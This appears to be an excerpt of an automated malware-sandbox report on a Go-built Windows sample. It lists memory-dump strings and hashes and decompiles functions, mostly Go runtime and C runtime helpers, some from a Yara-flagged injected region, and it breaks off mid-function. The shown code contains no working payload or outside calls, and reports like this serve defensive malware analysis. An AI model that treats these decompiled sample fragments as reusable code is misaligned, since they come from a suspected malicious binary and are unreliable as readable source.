                                                                                                                            • panicwrap: no ( in panicwrap: no ) in runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown wait reasonwinmm.dll not found markroot job, xrefs: 013081FA
                                                                                                                            • ./0:<=?CLMPSZ[\, xrefs: 013080CB
                                                                                                                            • pointer stack=[ status AcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeCyrillicDuployanEthiopicExtenderGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaReadFileTagbanwaTai_ThamTai_VietTifinaghUgariticWSAI, xrefs: 01308161
                                                                                                                            • panicwrap: no ) in runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown wait reasonwinmm.dll not found markroot jobs done to unalloca, xrefs: 013081B6
                                                                                                                            • panicwrap: unexpected string after type name: released less than one physical page of memoryruntime: failed to create new OS thread (have runtime: name offset base pointer out of rangeruntime: panic before malloc heap initializedruntime: text offset base poin, xrefs: 01308019
                                                                                                                            • called using nil *, g->atomicstatus=, gp->atomicstatus=Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreateSymbolicLinkWCryptReleaseContextEgypt Standard TimeGC work not flushedGetCurrentProcessIdGetSystemDirectoryWGetTokenInfor, xrefs: 01308136
                                                                                                                            • panicwrap: unexpected string after package name: runtime: unexpected waitm - semaphore out of syncs.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ysweeper left outstanding across sweep generationsattempt to exec, xrefs: 01307F3A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: called using nil *, g->atomicstatus=, gp->atomicstatus=Altai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreateSymbolicLinkWCryptReleaseContextEgypt Standard TimeGC work not flushedGetCurrentProcessIdGetSystemDirectoryWGetTokenInfor$ pointer stack=[ status AcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeCyrillicDuployanEthiopicExtenderGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaReadFileTagbanwaTai_ThamTai_VietTifinaghUgariticWSAI$)$./0:<=?CLMPSZ[\$panicwrap: no ( in panicwrap: no ) in runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown wait reasonwinmm.dll not found markroot job$panicwrap: no ) in runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown wait reasonwinmm.dll not found markroot jobs done to unalloca$panicwrap: unexpected string after package name: runtime: unexpected waitm - semaphore out of syncs.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ysweeper left outstanding across sweep generationsattempt to exec$panicwrap: unexpected string after type name: released less than one physical page of memoryruntime: failed to create new OS thread (have runtime: name offset base pointer out of rangeruntime: panic before malloc heap initializedruntime: text offset base poin$value method xadd64 failedxchg64 failed}sched={pc: but progSize nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limitCertCloseStoreCreateProcessWCryptGenRandomFindFirstFileWFormatMessageWGC assist waitGC worker in
                                                                                                                            • API String ID: 0-2435188883
                                                                                                                            • Opcode ID: 6ea0041e9e955b330939b95d25653d6fe7ca283d4ea229d62a129ba5c03d7fc6
                                                                                                                            • Instruction ID: b4676afbbf0bedb07bc75b108b5e891964ce6993e078f9ffc83be2b49ccc2e09
                                                                                                                            • Opcode Fuzzy Hash: 6ea0041e9e955b330939b95d25653d6fe7ca283d4ea229d62a129ba5c03d7fc6
                                                                                                                            • Instruction Fuzzy Hash: 7181AB32619BC181C7659B15F8503DEB7A5F789B88F888666EACC53B98DF3CD145CB00
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 75%
                                                                                                                            			E013066C0(void* __edx, void* __fp0, long long __rax, long long __rbx, long long __rbp, void* __r14, long long _a8) {
                                                                                                                            				char _v8;
                                                                                                                            				long long _v16;
                                                                                                                            				long long _v24;
                                                                                                                            				long long _v32;
                                                                                                                            				long long _v40;
                                                                                                                            				long long _v48;
                                                                                                                            				long long _v56;
                                                                                                                            				long long _v64;
                                                                                                                            				long long _v72;
                                                                                                                            				long long _v80;
                                                                                                                            				long long _v88;
                                                                                                                            				long long _v96;
                                                                                                                            				char _v104;
                                                                                                                            				long long _v112;
                                                                                                                            				long long _v120;
                                                                                                                            				long long _v128;
                                                                                                                            				long long _v136;
                                                                                                                            				long long _v144;
                                                                                                                            				long long _v152;
                                                                                                                            				long long _v160;
                                                                                                                            				long long _v168;
                                                                                                                            				long long _v176;
                                                                                                                            				long long _v184;
                                                                                                                            				long long _v272;
                                                                                                                            				void* _t92;
                                                                                                                            				void* _t98;
                                                                                                                            				void* _t100;
                                                                                                                            				void* _t105;
                                                                                                                            				void* _t109;
                                                                                                                            				void* _t110;
                                                                                                                            				void* _t111;
                                                                                                                            				void* _t114;
                                                                                                                            				long long _t124;
                                                                                                                            				long long _t125;
                                                                                                                            				long long _t126;
                                                                                                                            				long long _t128;
                                                                                                                            				long long _t131;
                                                                                                                            				long long _t134;
                                                                                                                            				long long _t135;
                                                                                                                            				intOrPtr _t137;
                                                                                                                            				long long _t140;
                                                                                                                            				long long _t141;
                                                                                                                            				intOrPtr _t143;
                                                                                                                            				void* _t151;
                                                                                                                            				long long _t153;
                                                                                                                            				void* _t167;
                                                                                                                            				long long _t181;
                                                                                                                            				void* _t194;
                                                                                                                            				void* _t196;
                                                                                                                            				void* _t200;
                                                                                                                            
                                                                                                                            				L0:
                                                                                                                            				while(1) {
                                                                                                                            					L0:
                                                                                                                            					_t201 = __r14;
                                                                                                                            					_t131 = __rbx;
                                                                                                                            					_t122 = __rax;
                                                                                                                            					_t109 = __edx;
                                                                                                                            					if( &_v128 >  *((intOrPtr*)(__r14 + 0x10))) {
                                                                                                                            						break;
                                                                                                                            					}
                                                                                                                            					L16:
                                                                                                                            					_a8 = __rax;
                                                                                                                            					E01356200(_t151, __rbp);
                                                                                                                            				}
                                                                                                                            				L1:
                                                                                                                            				_v8 = __rbp;
                                                                                                                            				_t181 =  &_v8;
                                                                                                                            				_a8 = __rax;
                                                                                                                            				_t140 =  *((intOrPtr*)(__rax));
                                                                                                                            				if(_t140 != 0) {
                                                                                                                            					_t124 = _t140;
                                                                                                                            					E013513C0(_t105, _t110, _t111, _t114, _t124, __rbx, _t167, _t181, _t194, __r14);
                                                                                                                            					_t141 = _t124;
                                                                                                                            					_t122 = _a8;
                                                                                                                            				} else {
                                                                                                                            					_t141 = 0x138737a;
                                                                                                                            				}
                                                                                                                            				_v176 = _t131;
                                                                                                                            				_v136 = _t141;
                                                                                                                            				_t125 =  *((intOrPtr*)(_t122 + 0x10));
                                                                                                                            				E013513C0(_t105, _t110, _t111, _t114, _t125, _t131, _t167, _t181, _t194, _t201);
                                                                                                                            				_t142 = _a8;
                                                                                                                            				_t153 =  *((intOrPtr*)(_a8 + 8));
                                                                                                                            				if(_t153 == 0) {
                                                                                                                            					r9d = 0xd;
                                                                                                                            					return E01345F80(9, _t114, _t125, 0x138a1ae, _t142, _v136, _v176, _t181, 0x1387e12, _t196, _t125, _t131, _t200, _t201);
                                                                                                                            				} else {
                                                                                                                            					_v160 = _t131;
                                                                                                                            					_v120 = _t125;
                                                                                                                            					_t126 = _t153;
                                                                                                                            					_t92 = E013513C0(_t105, _t110, _t111, _t114, _t126, _t131, _t167, _t181, _t194, _t201);
                                                                                                                            					_t143 = _a8;
                                                                                                                            					if( *((long long*)(_t143 + 0x20)) != 0) {
                                                                                                                            						_v272 = _t181;
                                                                                                                            						E01358B4B(_t92,  &_v104 - 0x20);
                                                                                                                            						_v104 = 0x138a1ae;
                                                                                                                            						_v96 = 0x16;
                                                                                                                            						_v88 = _t126;
                                                                                                                            						_v80 = _t131;
                                                                                                                            						_v72 = 0x1386f3d;
                                                                                                                            						_v64 = 8;
                                                                                                                            						_v56 = _v120;
                                                                                                                            						_v48 = _v160;
                                                                                                                            						_v40 = 0x1388a32;
                                                                                                                            						_v32 = 0x11;
                                                                                                                            						_v24 =  *((intOrPtr*)(_t143 + 0x18));
                                                                                                                            						_v16 =  *((intOrPtr*)(_t143 + 0x20));
                                                                                                                            						return E01345B60(9, 6, _t109, _t114, _t126,  &_v104, _t143, _t143,  *((intOrPtr*)(_t143 + 0x18)), _v272, _t194, _t196, _t200, _t201);
                                                                                                                            					} else {
                                                                                                                            						_v168 = _t131;
                                                                                                                            						_v128 = _t126;
                                                                                                                            						_v272 = _t181;
                                                                                                                            						E01358B4B(_t92,  &_v104 - 0x20);
                                                                                                                            						_t187 = _v272;
                                                                                                                            						_v104 = 0x138a1ae;
                                                                                                                            						_v96 = 0x16;
                                                                                                                            						_v88 = _v136;
                                                                                                                            						_v80 = _v176;
                                                                                                                            						_v72 = 0x138692f;
                                                                                                                            						_v64 = 4;
                                                                                                                            						_v56 = _t126;
                                                                                                                            						_v48 = _t131;
                                                                                                                            						_v40 = 0x1386c11;
                                                                                                                            						_v32 = 6;
                                                                                                                            						_v24 = _v120;
                                                                                                                            						_t179 = _v160;
                                                                                                                            						_v16 = _v160;
                                                                                                                            						_t174 = _t143;
                                                                                                                            						_t134 =  &_v104;
                                                                                                                            						_t98 = E01345B60(9, 6, _t109, _t114, _t126, _t134, _t143, _t143, _v160, _v272, _t194, _t196, _t200, _t201);
                                                                                                                            						_t144 = _v168;
                                                                                                                            						_t166 = _v160;
                                                                                                                            						if(_v168 == _v160) {
                                                                                                                            							_v144 = _t126;
                                                                                                                            							_v184 = _t134;
                                                                                                                            							_t135 = _v120;
                                                                                                                            							_t98 = E013021C0(_t98, 9, 6, _t109, _v128, _t135, _t144);
                                                                                                                            							if(_t98 != 0) {
                                                                                                                            								_t128 =  *((intOrPtr*)(_a8 + 8));
                                                                                                                            								E013514E0(6, _t110, _t111, _t114, _t128, _t135, _t166, _t174, _t187, _t194, _t201);
                                                                                                                            								_v112 = _t128;
                                                                                                                            								_v152 = _t135;
                                                                                                                            								_t129 =  *((intOrPtr*)(_a8 + 0x10));
                                                                                                                            								_t100 = E013514E0(6, _t110, _t111, _t114, _t129, _t135, _t166, _t174, _t187, _t194, _t201);
                                                                                                                            								_t148 = _v152;
                                                                                                                            								if(_t135 != _v152) {
                                                                                                                            									L11:
                                                                                                                            									_t98 = E01345E00(9, _t114, _t129, _v144, _v184, 0x138c531, _t179, _t187, _t194, _t196, _t200, _t201);
                                                                                                                            								} else {
                                                                                                                            									_t137 = _t129;
                                                                                                                            									_t129 = _v112;
                                                                                                                            									if(E013021C0(_t100, 9, 6, _t109, _v112, _t137, _t148) != 0) {
                                                                                                                            										_t98 = E01345E00(9, _t114, _t129, _v144, _v184, 0x138bf3e, _t179, _t187, _t194, _t196, _t200, _t201);
                                                                                                                            									} else {
                                                                                                                            										goto L11;
                                                                                                                            									}
                                                                                                                            								}
                                                                                                                            							} else {
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            						return _t98;
                                                                                                                            					}
                                                                                                                            				}
                                                                                                                            			}

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • API String ID: 0-3027403543
                                                                                                                            • Opcode ID: 3d6eb57f692d0e685c34065ff43a699b8cf4f380681efe79875c56a22503b08d
                                                                                                                            • Instruction ID: 079ae1ca5b459bd1371d4c07c11c0d0414c1cbcb999340e610700ba504fa743c
                                                                                                                            • Opcode Fuzzy Hash: 3d6eb57f692d0e685c34065ff43a699b8cf4f380681efe79875c56a22503b08d
                                                                                                                            • Instruction Fuzzy Hash: F491C376208BC5C5DB60DB19F4503DAB3A5F788B88F548026DACC57B58EF79C199CB00
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 77%
                                                                                                                            			E0133CE60(void* __eax, void* __ecx, void* __edx, void* __edi, void* __esi, void* __esp, long long __rax, void* __rbx, void* __rdi, void* __rsi, long long __rbp, long long __r14) {
                                                                                                                            				char _v8;
                                                                                                                            				long long _v16;
                                                                                                                            				long long _v24;
                                                                                                                            				long long _v32;
                                                                                                                            				char _v56;
                                                                                                                            				long long _v64;
                                                                                                                            				long long _v72;
                                                                                                                            				long long _v80;
                                                                                                                            				long long _v88;
                                                                                                                            				long long _v96;
                                                                                                                            				void* _t45;
                                                                                                                            				void* _t70;
                                                                                                                            				void* _t80;
                                                                                                                            				void* _t82;
                                                                                                                            				void* _t83;
                                                                                                                            				void* _t84;
                                                                                                                            				void* _t85;
                                                                                                                            				void* _t86;
                                                                                                                            				void* _t90;
                                                                                                                            				long long _t93;
                                                                                                                            				intOrPtr _t112;
                                                                                                                            				long long _t113;
                                                                                                                            				long long _t116;
                                                                                                                            				long long _t117;
                                                                                                                            				void* _t119;
                                                                                                                            				void* _t120;
                                                                                                                            				void* _t125;
                                                                                                                            				void* _t126;
                                                                                                                            				long long _t129;
                                                                                                                            				void* _t130;
                                                                                                                            
                                                                                                                            				_t129 = __r14;
                                                                                                                            				_t120 = __rsi;
                                                                                                                            				_t119 = __rdi;
                                                                                                                            				_t111 = __rbx;
                                                                                                                            				_t91 = __rax;
                                                                                                                            				_t86 = __esp;
                                                                                                                            				_t84 = __esi;
                                                                                                                            				_t83 = __edi;
                                                                                                                            				_t82 = __edx;
                                                                                                                            				_t80 = __ecx;
                                                                                                                            				_t126 = _t125 - 0x30;
                                                                                                                            				_v8 = __rbp;
                                                                                                                            				_t122 =  &_v8;
                                                                                                                            				_t112 =  *((intOrPtr*)(__r14 + 0x30));
                                                                                                                            				asm("o16 nop [eax+eax]");
                                                                                                                            				if( *((long long*)(_t112 + 0xa0)) != 0) {
                                                                                                                            					_t70 = 0x14;
                                                                                                                            					_t45 = E01330BA0(0x1389a2c, __rbx, _t122);
                                                                                                                            					asm("int3");
                                                                                                                            					asm("int3");
                                                                                                                            					L9:
                                                                                                                            					while(1) {
                                                                                                                            						if(_t126 <=  *((intOrPtr*)(_t129 + 0x10))) {
                                                                                                                            							L18:
                                                                                                                            							_t45 = E01356200(_t116, _t122);
                                                                                                                            							continue;
                                                                                                                            						}
                                                                                                                            						_t126 = _t126 - 0x40;
                                                                                                                            						_v56 = _t122;
                                                                                                                            						_t122 =  &_v56;
                                                                                                                            						_t113 =  *((intOrPtr*)(_t129 + 0x30));
                                                                                                                            						_t93 =  *((intOrPtr*)(_t113 + 0xa0));
                                                                                                                            						if(_t93 == 0) {
                                                                                                                            							L17:
                                                                                                                            							_t70 = 0x15;
                                                                                                                            							E01330BA0(0x1389daf, _t111, _t122);
                                                                                                                            							goto L18;
                                                                                                                            						}
                                                                                                                            						_v64 = _t113;
                                                                                                                            						_v72 = _t93;
                                                                                                                            						_t116 =  *((intOrPtr*)(_t93 + 0x38));
                                                                                                                            						_v96 = _t116;
                                                                                                                            						if(_t116 != _t113 ||  *((intOrPtr*)(_t93 + 4)) != 1) {
                                                                                                                            							_t81 =  *((intOrPtr*)(_t93 + 4));
                                                                                                                            							_v88 = _t113;
                                                                                                                            							E01332340(_t116, _t122, _t129);
                                                                                                                            							E01332C40( *((intOrPtr*)(_t93 + 4)), _t83, _t84, _t86, 0x1387d4c, _t111, _t122, _t129);
                                                                                                                            							E01332BC0( *((intOrPtr*)(_t93 + 4)), _t83, _t84, _t86, _v64, _t119, _t122, _t129);
                                                                                                                            							E01332C40( *((intOrPtr*)(_t93 + 4)), _t83, _t84, _t86, 0x1386bd5, _t111, _t122, _t129);
                                                                                                                            							E01332BC0(_t81, _t83, _t84, _t86, _v72, _t119, _t122, _t129);
                                                                                                                            							E01332C40(_t81, _t83, _t84, _t86, 0x1386bed, _t111, _t122, _t129);
                                                                                                                            							L01332AA0(_t82, _t83, _t86, _v96, _t113, _t122, _t129);
                                                                                                                            							E01332C40(_t81, _t83, _t84, _t86, 0x138771a, _t111, _t122, _t129);
                                                                                                                            							E01332940(_t83, _t84, _t86, _v88, _t113, _t122, _t129);
                                                                                                                            							E013325A0(_t81, _t82, _t83, _t84, _t86, _t122, _t129);
                                                                                                                            							L013323C0(_t116, _t122, _t129);
                                                                                                                            							E01330BA0(0x138af91, _t111, _t122);
                                                                                                                            							goto L17;
                                                                                                                            						}
                                                                                                                            						_v80 = _t129;
                                                                                                                            						if( *0x14814f0 != 0) {
                                                                                                                            							_t45 = E0134C8E0(_t45, _t70, _t82, _t85, _t86, _t90, _t93, _t119,  &_v56, _t129, _t130);
                                                                                                                            							_t93 = _v72;
                                                                                                                            						}
                                                                                                                            						 *((long long*)( *((intOrPtr*)(_v80 + 0x30)) + 0xa0)) = 0;
                                                                                                                            						 *((long long*)(_t93 + 0x38)) = 0;
                                                                                                                            						 *((intOrPtr*)(_t93 + 4)) = 0;
                                                                                                                            						return _t45;
                                                                                                                            						goto L19;
                                                                                                                            					}
                                                                                                                            				} else {
                                                                                                                            					_t117 =  *((intOrPtr*)(__rax + 0x38));
                                                                                                                            					_v16 = _t117;
                                                                                                                            					if(_t117 != 0) {
                                                                                                                            						L5:
                                                                                                                            						_t117 =  *((intOrPtr*)(_t117 + 0xb8));
                                                                                                                            						L6:
                                                                                                                            						_v32 = _t117;
                                                                                                                            						_v24 = _t91;
                                                                                                                            						E01332340(_t117, _t122, _t129);
                                                                                                                            						E01332C40(_t80, _t83, _t84, _t86, 0x1387dac, _t111, _t122, _t129);
                                                                                                                            						E01332940(_t83, _t84, _t86, _v16, _t112, _t122, _t129);
                                                                                                                            						E01332C40(_t80, _t83, _t84, _t86, "()+,-./0:<=?CLMPSZ[\\", _t111, _t122, _t129);
                                                                                                                            						E01332A40(_t80, _t82, _t83, _t84, _t86, _v32, _t120, _t122, _t129);
                                                                                                                            						E01332C40(_t80, _t83, _t84, _t86, 0x1387b00, _t111, _t122, _t129);
                                                                                                                            						E01332940(_t83, _t84, _t86, _v24, _t112, _t122, _t129);
                                                                                                                            						E013325A0(_t80, _t82, _t83, _t84, _t86, _t122, _t129);
                                                                                                                            						L013323C0(_t117, _t122, _t129);
                                                                                                                            						_t91 = 0x138a366;
                                                                                                                            						E01330BA0(0x138a366, _t111, _t122);
                                                                                                                            						L7:
                                                                                                                            						_t82 = 0;
                                                                                                                            						goto L6;
                                                                                                                            					}
                                                                                                                            					if( *((intOrPtr*)(__rax + 4)) != 0) {
                                                                                                                            						if(_t117 == 0) {
                                                                                                                            							goto L7;
                                                                                                                            						}
                                                                                                                            						goto L5;
                                                                                                                            					}
                                                                                                                            					 *((long long*)(_t112 + 0xa0)) = __rax;
                                                                                                                            					 *((long long*)(__rax + 0x38)) =  *((intOrPtr*)(__r14 + 0x30));
                                                                                                                            					 *((intOrPtr*)(__rax + 4)) = 1;
                                                                                                                            					return __eax;
                                                                                                                            				}
                                                                                                                            				L19:
                                                                                                                            			}


                                                                                                                            Strings
                                                                                                                            • ()+,-./0:<=?CLMPSZ[\, xrefs: 0133CF05
                                                                                                                            • m->p= max= min= next= p->m= prev= span=% util(...), i = , not <-chanArabicBrahmiCarianChakmaCommonCopticGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianRejangSCHED SyriacTai_LeTangutTeluguThaanaUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11Wa, xrefs: 0133D038
                                                                                                                            • wirep: invalid p state) must be a power of 2Argentina Standard TimeAstrakhan Standard TimeCertGetCertificateChainDestroyEnvironmentBlockE. Africa Standard TimeE. Europe Standard TimeFreeEnvironmentStringsWGetEnvironmentVariableWGetSystemTimeAsFileTimeGreenlan, xrefs: 0133CF4F
                                                                                                                            • wirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not found pcHeader.textStart= previous allocCount=, levelBits[level] = AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_HieroglyphsArabian Standard TimeBelarus Standard TimeCentral Stan, xrefs: 0133CF6C
                                                                                                                            • ) p->status=, cons/mark -byte limitBidi_ControlGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetStdHandleGetTempPathWJoin_ControlLoadLibraryWMeetei_MayekPahawh_HmongReadConsoleWRevertToSelfSetEndOfFileSora_SompengSyloti_NagriTransmitFileUnlockFileExVirtualA, xrefs: 0133CF25
                                                                                                                            • releasep: m=runtime: gp=runtime: sp=self-preemptshort bufferspanSetSpinesweepWaiterstraceStringswirep: p->m=worker mode != sweepgen MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base, xrefs: 0133D01D
                                                                                                                            • wirep: p->m=worker mode != sweepgen MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (CertOpenStoreFi, xrefs: 0133CEE5
                                                                                                                            • p->status= s.nelems= schedtick= span.list= timerslen=, elemsize=, npages = /dev/stderr/dev/stdout: frame.sp=CloseHandleCreateFileWDeleteFileWDives_AkuruExitProcessFreeLibraryGOTRACEBACKGetFileTypeIdeographicMedefaidrinMoveFileExWNandinagariNetShareAddNetShar, xrefs: 0133D06F
                                                                                                                            • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= stale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruption/lib/time/zoneinfo.zipAleutia, xrefs: 0133D0AA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: m->p= max= min= next= p->m= prev= span=% util(...), i = , not <-chanArabicBrahmiCarianChakmaCommonCopticGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianRejangSCHED SyriacTai_LeTangutTeluguThaanaUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11Wa$ p->status= s.nelems= schedtick= span.list= timerslen=, elemsize=, npages = /dev/stderr/dev/stdout: frame.sp=CloseHandleCreateFileWDeleteFileWDives_AkuruExitProcessFreeLibraryGOTRACEBACKGetFileTypeIdeographicMedefaidrinMoveFileExWNandinagariNetShareAddNetShar$()+,-./0:<=?CLMPSZ[\$) p->status=, cons/mark -byte limitBidi_ControlGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetStdHandleGetTempPathWJoin_ControlLoadLibraryWMeetei_MayekPahawh_HmongReadConsoleWRevertToSelfSetEndOfFileSora_SompengSyloti_NagriTransmitFileUnlockFileExVirtualA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= stale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruption/lib/time/zoneinfo.zipAleutia$releasep: m=runtime: gp=runtime: sp=self-preemptshort bufferspanSetSpinesweepWaiterstraceStringswirep: p->m=worker mode != sweepgen MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base$wirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not found pcHeader.textStart= previous allocCount=, levelBits[level] = AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_HieroglyphsArabian Standard TimeBelarus Standard TimeCentral Stan$wirep: invalid p state) must be a power of 2Argentina Standard TimeAstrakhan Standard TimeCertGetCertificateChainDestroyEnvironmentBlockE. Africa Standard TimeE. 
Europe Standard TimeFreeEnvironmentStringsWGetEnvironmentVariableWGetSystemTimeAsFileTimeGreenlan$wirep: p->m=worker mode != sweepgen MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (CertOpenStoreFi
                                                                                                                            • API String ID: 0-1304509279
                                                                                                                            • Opcode ID: 9f79ace69b4d66eb0cc0867999860c4cd7383cca0cc3cb8ab2c9e6c9baedf71a
                                                                                                                            • Instruction ID: 9c783f24af1180a9239c00f90daa67c161136b55c40dca299eb021bd1327b8c4
                                                                                                                            • Opcode Fuzzy Hash: 9f79ace69b4d66eb0cc0867999860c4cd7383cca0cc3cb8ab2c9e6c9baedf71a
                                                                                                                            • Instruction Fuzzy Hash: C5519A76215B41CAEB18EB18E48039EBBA4F7D8B88F849522EE8D07734DF38C554C718
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3191669884-0
                                                                                                                            • Opcode ID: 34021061f25f4aaf93eb7309e6822a76a1a5c9311dbfd77510108ad3902d63ad
                                                                                                                            • Instruction ID: 56c2d466eaa4297e8e56b0eb57c6af1ccb41ebaab7c5722ea30a6914a7c0e59c
                                                                                                                            • Opcode Fuzzy Hash: 34021061f25f4aaf93eb7309e6822a76a1a5c9311dbfd77510108ad3902d63ad
                                                                                                                            • Instruction Fuzzy Hash: E131BE32508E088FDB56DF189C8976973D2FB58321F2542ADF409C76E2EB30EC4187A9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$__doserrno__lock_fhandle_getptd_noexit_unlock_fhandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4120058822-0
                                                                                                                            • Opcode ID: 93de5d66caa2dc7aad5c9ab8ee0fc4b3249cab4f79d00ba50f3959950398e7b3
                                                                                                                            • Instruction ID: 0129089ea57d7746c5b7550189b4a34ea80c858a7de7674bb695798d2bdf892e
                                                                                                                            • Opcode Fuzzy Hash: 93de5d66caa2dc7aad5c9ab8ee0fc4b3249cab4f79d00ba50f3959950398e7b3
                                                                                                                            • Instruction Fuzzy Hash: 7C21C523604F048EFB16AB689C9D3797691EB46332F25425DF816C76E3D77C984083B9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 77%
                                                                                                                            			E0000025B25BF8A899B0(void* __edx, intOrPtr __edi, void* __eflags, long long __rbx, void* __rcx, long long __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9) {
                                                                                                                            				void* _v8;
                                                                                                                            				char _v16;
                                                                                                                            				intOrPtr _v24;
                                                                                                                            				intOrPtr _v32;
                                                                                                                            				char _v40;
                                                                                                                            				intOrPtr _v48;
                                                                                                                            				intOrPtr _v56;
                                                                                                                            				long long _v64;
                                                                                                                            				intOrPtr _v72;
                                                                                                                            				void* _t26;
                                                                                                                            				void* _t28;
                                                                                                                            				void* _t39;
                                                                                                                            				void* _t40;
                                                                                                                            				intOrPtr* _t51;
                                                                                                                            				intOrPtr* _t73;
                                                                                                                            				void* _t81;
                                                                                                                            
                                                                                                                            				_t53 = __rbx;
                                                                                                                            				_t40 = __edx;
                                                                                                                            				r9d = 0;
                                                                                                                            				goto 0xf8a899b8;
                                                                                                                            				_t51 = _t73;
                                                                                                                            				 *((long long*)(_t51 + 8)) = __rbx;
                                                                                                                            				 *((long long*)(_t51 + 0x10)) = __rbp;
                                                                                                                            				 *((long long*)(_t51 + 0x18)) = __rsi;
                                                                                                                            				 *((long long*)(_t51 + 0x20)) = __rdi;
                                                                                                                            				_t5 = _t51 - 0x28; // -51
                                                                                                                            				E0000025B25BF8A7C0AC(_t51, _t5, __r9);
                                                                                                                            				if (__r8 != 0) goto 0xf8a899f5;
                                                                                                                            				goto 0xf8a89a87;
                                                                                                                            				if (__rcx == 0) goto 0xf8a899ff;
                                                                                                                            				if (__rdx != 0) goto 0xf8a89a16;
                                                                                                                            				_t26 = E0000025B25BF8A7B89C(_t51);
                                                                                                                            				 *_t51 = 0x16;
                                                                                                                            				E0000025B25BF8A7BEC4(_t26);
                                                                                                                            				goto 0xf8a89a87;
                                                                                                                            				if (__r8 - __rbx <= 0) goto 0xf8a89a32;
